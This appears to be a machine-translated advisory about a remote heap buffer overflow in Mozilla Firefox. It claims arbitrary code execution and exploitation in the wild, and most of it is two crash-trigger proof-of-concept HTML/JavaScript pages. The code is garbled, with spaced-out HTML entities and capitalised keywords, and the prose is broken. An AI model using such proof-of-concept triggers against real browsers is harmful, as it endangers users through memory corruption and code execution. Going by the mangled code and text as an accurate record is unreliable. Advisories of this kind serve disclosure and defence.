Mozilla Firefox is a remote heap buffer overflow vulnerability.
Successful attacks allow attackers to run arbitrary code in the user Context of the application.
A failed attack may cause a denial of service condition.
Test method:
This problem is currently being exploited in the wild.
The following proof of concept code is available (from Mozilla test cases:
& Lt; html & gt; & lt; body & gt;
& Lt; script & gt;
Function G (str ){
Var cobj = document. createElement (str );
Document. body. appendChild (cobj );
Cobj. scrollWidth;
}
Function crashme (){
Document. write (& quot; fooFOO & quot ;);
G (& quot; a & quot ;);
Document. write (& quot; & lt; a lang & gt; & lt;/a & gt; a & quot ;);
G (& quot; base & quot ;);
Document. write (& quot; barBAR & quot ;);
G (& quot; audio & quot ;);
}
& Lt;/script & gt;
& Lt; script & gt; crashme (); & lt;/script & gt;
& Lt;/body & gt;
& Lt;/html & gt;
& Lt; html & gt; & lt; body & gt;
& Lt; script & gt;
Function getatts (str ){
Var cobj = document. createElement (str );
Cobj. id = & quot; testcase & quot ;;
Document. body. appendChild (cobj );
Var obj = document. getElementById (& quot; testcase & quot ;);
Var atts = new Array ();
For (p in obj ){
If (typeof (obj [p]) ==& quot; string & quot ;){
Atts. push (p );
}
}
Document. body. removeChild (cobj );
Return atts;
}
Function crashme (){
Var tags = new Array (& quot; audio & quot;, & quot; a & quot;, & quot; base & quot ;);
For (rows = 0; rows & lt; 0x8964; rows ++ ){
For (I = 0; I & lt; tags. length; I ++ ){
Var atts = getatts (tags );
For (j = 0; j & lt; atts. length; j ++ ){
Var html = & quot; & lt; & quot; + tags + & quot; + atts [j] + & quot; = a & gt; & lt; /& quot; + tags +
& Quot; & gt; & quot; + tags;
Document. write (html );
}
}
}
}
& Lt;/script & gt;
& Lt; button onclick = & quot; crashme (); & quot; & gt; Crash Me! & Lt;/button & gt;
& Lt;/body & gt; & lt;/html & gt;